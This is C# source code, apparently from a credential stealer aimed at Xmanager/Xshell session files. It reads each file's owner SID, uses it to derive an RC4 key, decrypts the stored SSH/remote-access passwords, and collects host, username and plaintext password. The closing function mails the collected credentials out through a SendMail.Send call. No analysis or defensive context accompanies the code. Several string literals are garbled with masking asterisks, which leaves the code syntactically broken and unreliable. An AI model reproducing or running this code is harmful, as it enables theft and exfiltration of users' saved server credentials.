public void Xmangager(string path, string UserSid)
{
string sourse = File.ReadAllText(path);
string arg = MidStrEx(sourse, "Host=", "\r\n");
string arg2 = MidStrEx(sourse, "[CONNECTION]\r\nPort=", "\r\n");
string arg3 = MidStrEx(sourse, "UserName="******"\r\n");
string text = MidStrEx(sourse, "Password="******"\r\n");
string arg4 = MidStrEx(sourse, "[SessionInfo]\r\nVersion=", "\r\n");
if (text != null && text != "")
{
byte[] array = Convert.FromBase64String(text);
byte[] pwd = new SHA256Managed().ComputeHash(Encoding.ASCII.GetBytes(UserSid));
byte[] array2 = new byte[array.Length - 32];
Array.Copy(array, 0, array2, 0, array.Length - 32);
byte[] bytes = RC4.Decrypt(pwd, array2);
Console.WriteLine("[+] Session File:" + path);
Console.WriteLine(" Host: {0}", arg);
Console.WriteLine(" Port: {0}", arg2);
Console.WriteLine(" UserName: {0}", arg3);
Console.WriteLine(" Version: {0}", arg4);
Console.WriteLine(" Password: {0}", text);
Console.WriteLine(" UserSid(Key): {0}", UserSid);
Console.WriteLine(" Decrypt: {0}", Encoding.ASCII.GetString(bytes));
}
}
public static void XmangagerPwd()
{
List <string> xsh_pathlist = XmangagerCrypt.checkPath();
StringBuilder strbuf = new StringBuilder();
foreach (string path in xsh_pathlist)
{
FileInfo fileInfo = new FileInfo(path);
FileSecurity fileSecurity = fileInfo.GetAccessControl();
IdentityReference identityReference = fileSecurity.GetOwner(typeof(NTAccount));
int idx = identityReference.Value.IndexOf('\\');
if (idx == -1)
{
idx = identityReference.Value.IndexOf('@');
}
string userName = identityReference.Value.Substring(idx + 1);
string userSid = null;
try
{
DirectoryEntry obDirEntry = new DirectoryEntry("WinNT://" + identityReference.Value.Replace(@"\", @"/"));
PropertyCollection coll = obDirEntry.Properties;
object obVal = coll["objectSid"].Value;
userSid = userName + XmangagerCrypt.ConvertByteToStringSid((Byte[])obVal);//获取该所有者的SID
}
catch (System.Runtime.InteropServices.COMException)
{
continue;
}
using (StreamReader sr = new StreamReader(path))
{
string Host = "null";
string UserName = "******";
string password = "******";
string rawPass;
string pattern = @"Password=(.*?)";
while ((rawPass = sr.ReadLine()) != null)
{
if (System.Text.RegularExpressions.Regex.IsMatch(rawPass, @"Host=(.*?)"))
{
Host = rawPass.Replace("Host=", "");
}
if (System.Text.RegularExpressions.Regex.IsMatch(rawPass, pattern))
{
rawPass = rawPass.Replace("Password="******"");
if (rawPass.Equals(""))
{
continue;
}
byte[] data = Convert.FromBase64String(rawPass);
byte[] Key = new SHA256Managed().ComputeHash(Encoding.ASCII.GetBytes(userSid));
byte[] passData = new byte[data.Length - 0x20];
Array.Copy(data, 0, passData, 0, data.Length - 0x20);
byte[] decrypted = RC4.Decrypt(Key, passData);
password = Encoding.ASCII.GetString(decrypted);
}
if (System.Text.RegularExpressions.Regex.IsMatch(rawPass, @"UserName=(.*?)"))
{
UserName = rawPass.Replace("UserName="******"");
}
}
strbuf.Append("Host: " + Host + " UserName: "******" Decrypt: " + password);
}
strbuf.Append(Environment.NewLine);
}
SendMail.Send(strbuf);
}
